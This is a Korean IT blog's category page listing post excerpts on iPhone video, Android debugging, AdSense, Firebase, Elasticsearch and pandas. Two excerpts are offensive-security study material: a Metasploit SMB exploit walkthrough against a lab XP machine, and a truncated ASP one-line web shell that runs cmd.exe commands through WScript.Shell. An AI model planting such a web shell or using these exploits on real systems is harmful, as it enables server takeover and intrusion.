본문 바로가기
  • Survival Plan

IT 이야기34

애플 원테이크 (Apple OneTake) 영상 - iPhone 11 Pro 홍보 영상으로 러시아 박물관 소개 영상 (5시간) 안녕하세요. 엊그제 Apple 이 iPhone 11 Pro 를 공개하면서, 5시간 이상 동영상을 플레이/촬영 할 수 있다는 성능을 주장 했습니다. 실제 iPhone 11 Pro를 통해서 러시아 박물관을 촬영 했으며, 촬영 후 배터리가 19% 이상 남아있었다고 공개 했습니다. 그 때 iPhone으로 직접 촬영한 5시간 19분 분량의 트레일러 영상- 러시아 예르미타쥐 (Hermitage) 박물관을 소개하는 홍보 영상-을 공개 했는데, 이게 상당히 고퀄이라서 코로나 때문에 밖으로 나가기 힘든 요즘, 안방에서 미술품을 구경하기 좋다고 합니다. 참고로 저는 러시아에서 1년 가량 보냈었는데, 모스크바에 주로 있어서 예르미타쥐를 가보지는 못했었는데요. 러시아/우크라이나 지방에 대해서 좀 안다고 자랑하고 있는 제가 부.. 2020. 3. 21.
ADB와 Logcat 이용하여 스마트폰 디버깅 모바일 어플을 개발하면서 답답함을 느낄 때가 자주 발생하곤 합니다. 그 이유는, 기존 PC / Desktop / Server 용 어플리케이션 개발은 익숙한 환경에서 로그를 확인 할 수 있지만, 모바일 환경은 그게 어렵기 때문이죠. 가뜩이나, 모바일은 권한 자체도 admin 권한이 아니기 때문에 더욱 그러합니다. 마치 Guest User로 원격지에 있는 PC를 사용하는 느낌이랄까요? 대표적으로, 모바일 어플이 찍어주는 콘솔로그를 보고 싶은 경우입니다. 한마디로 가. 시. 화 가 안된다는 거죠. ( 디버그 환경에서는 콘솔로그 창을 별도로 열고 있기 때문에, 로그 레벨별로 확인이 가능하지만, On Device에서 구동되는 것은 콘솔로그가 보이지 않는다. ) 이렇게 모바일 환경에서 로그를 확인하고자 할 때, 로.. 2020. 3. 16.
구글 애드센스 승인 전략 애드센스(AdSense)는 광고 서비스 플랫폼 입니다. 광고 서비스 플랫폼이란 무엇이고 누가 무엇을 위해 비즈니스하고, 누가 수익을 얻으며, 왜 하려는지를 생각해 봅시다. 이런 역학관계를 먼저 살펴 보고, 기술적으로 어떤 행위들을 할 수 있는지를 살펴 본다면, AdSense 승인을 받기 위해 추구해야 하는 전략적 방향성과 범위가 구체화 될것 입니다. 더보기 에드센스 신청 및 승인 절차는 기존 작성된 글을 참조 해 주세요 https://windflex.tistory.com/36 구글 애드센스 (AdSense) 승인 절차 [블로그 시작] Tisotry 계정을 받아 놓은 지는 좀 되었었는데, 방치해 두고 있다가 본격적으로 시작한지 1주일 정되 되었습니다. 아직 블로그를 어떻게 하는지도 잘 모르는데, 일단 주변.. 2020. 3. 16.
안드로이드 개발자 옵션 및 디버깅 옵션 켜기 [ 개발자 옵션 켜기 / USB 디버깅 옵션 켜기 ] 스마트폰을 USB로 연결하여 디버깅을 하거나, Shell에 붙어서 무엇인가를 하려면, 개발자 옵션을 켜 주어야 합니다. 간혹, USB를 연결하고도 ADB (Android Debugging Bridge)가 접속되지 않는데, USB 디버깅 권한이 없어서인 경우가 대다수 입니다. ADB 사용하여 USB 디버깅 설정 / logcat 사용하기 더보기 https://windflex.tistory.com/58 [준비중] Logcat 사용하여 단말 디버깅 모바일 어플을 개발하면서 답답함을 느낄 때가 자주 발생하곤 합니다. 그 이유는, 기존 PC / Desktop / Server 용 어플리케이션 개발은 익숙한 환경에서 로그를 확인 할 수 있지만, 모바일 환경은 그게 .. 2020. 3. 11.
Play Store 업데이트 후 signing (SHA-1) Google Play Store에 모바일 앱의 버전을 업데이트 했더니, 구글 서비스 (Firebase 및 Google Analytics)의 연결이 모두 해제가 되었다. 아래처럼 통계지표에서 앱 연결이 모두 해제가 되어 있었다. 조금 더 확인 해 보니, 구글 Play Store와는 무관하게 Firebase에서 앱의 지문(Footprint)에 해당하는 SHA-1 정보를 입력해 주어야 하는 것으로 확인 되었다. "디지털 지문을 추가" 버튼을 누르면, 역시나 디지털 지문이 없다. * 디지털 지문이 바뀌었으니, 디지털 지문이 바뀌게 된 원인을 파악하자. ex) 앱 구성정보가 바뀌었거나, 앱이름/등록정보 등... 디지털 지문을 생성하여 추가해 주도록 하자. 기본을 SHA-1 으로 하고 있으니, SHA-1을 생성해 .. 2020. 3. 11.
메타스플로잇 (metasploit) 맛보기 메타스플로잇을 활용한 간략한 보안 테스트를 진행해 보자. ㅇ XP: 192.168.182.152 (Victim) ㅇ backtrack : 192.168.182.151 (Attacker) SMB (Server Message Block) 취약점 활용 메타스플로잇 테스트 - 이기종 간 파일전송을 위해 만들어진 프로토콜이지만, 최근에는 프린터와 통신을 위해서 사용되고 있음 SMB 버전 및 취약점이 있는지 확인하는 module을 실행한다. SMB 취약점이 존재하므로, 관련된 Exploit 를 실행하고, 연결할 수 있는 payload를 실행한다. exploit 실행 meterpreter에서 추가 모듈 로드 (ex. load sniffer ) 후, 현재 로딩된 모듈 확인 (ex. load -l) 현재 Running .. 2020. 3. 10.
Single Line Web Shell 과거에 끄적 거리던 글을 정리하다가 남겨 본다. 소위 한줄 웹쉘이라 불리는 Simple Web Shell 이다. 이제는 잘 사용하지 않는 ASP 환경에서 구동되었던 웹쉘인데, 언어가 바뀌어도 로직은 그대로 이기 때문에 웹쉘의 기능상으로 크게 변동이 없다. 아래는 간략히 로직을 파악하기 위한 것이다. (부적절한 곳에 사용하지 말고, 보안을 강화하기 위한 공부 용도로 사용하길 바란다.) TEST END! Command Form Command : Reslut: 명령어 라인 Dim WshShell,oExec,cc: CMD="dir": Set WshShell = CreateObject("WScript.Shell"):Set oExec = WshShell.Exec("cmd.exe /c"+CMD): response.W.. 2020. 3. 10.
엘라스틱서치(ES) 인덱스 리스팅 / 타입 리스팅 [ES 인덱스 리스팅 / 타입 리스팅 ] ㅇ 인덱스 리스트 얻기 http://150.19.5.30:9200//_cat/indices?v ㅇ 기본 검색 http://150.19.5.30:9200/skt-20170920/vdi_file/_search?q=*&sort=emp_id:asc ㅇ 도큐먼트 타입 (Document Type) 리스팅 엘라스틱서치(ES)는 기본적으로, Zero or 1개 이상의 Index 를 보유하고, Index 안에는 다시, document type의 구조를 가지는데.. 이러한 관계를 Mapping으로 정의하고 있다. 이러한 Mapping 을 커스터마이징 할 수 있도록 지원하고 있는데, 이를 이용하면, 현재 ES에 적재되어 있는 인덱스와, _type을 리스트업 할 수 있다. 모든 인덱스.. 2020. 3. 10.
[파이썬] 판다스 데이터프레임 X 엑셀 - Pandas X Excel 판다스 데이터프레임을 엑셀로 저장하여 처리하기 (Python DataFrame to Excel) 파이썬 (Python) 데이터 분석을 위한 대표 패키지 - Pandas와 DataFrame X 전통적인 스프레드시트의 강자 엑셀 (Excel) 여러분은 파이썬의 pandas를 사용하면서 느끼는 가장 아쉬운 점은 무엇인가요? 물론, Anaconda / Jupyter Notebook 환경을 포함하는 부분입니다. import pandas as pd 제 경우는 가장 불편한 점은, DataFrame이 커지면 커질 수록 데이터를 가시적으로 파악하기 어렵다는 것 입니다. df.head() head() 명령를 이용해서 첫 몇개의 행(rows)를 확인할 수 있지만, 경우에 따라서는 전체를 파악해야 하는 경우가 있습니다. 대표.. 2020. 3. 10.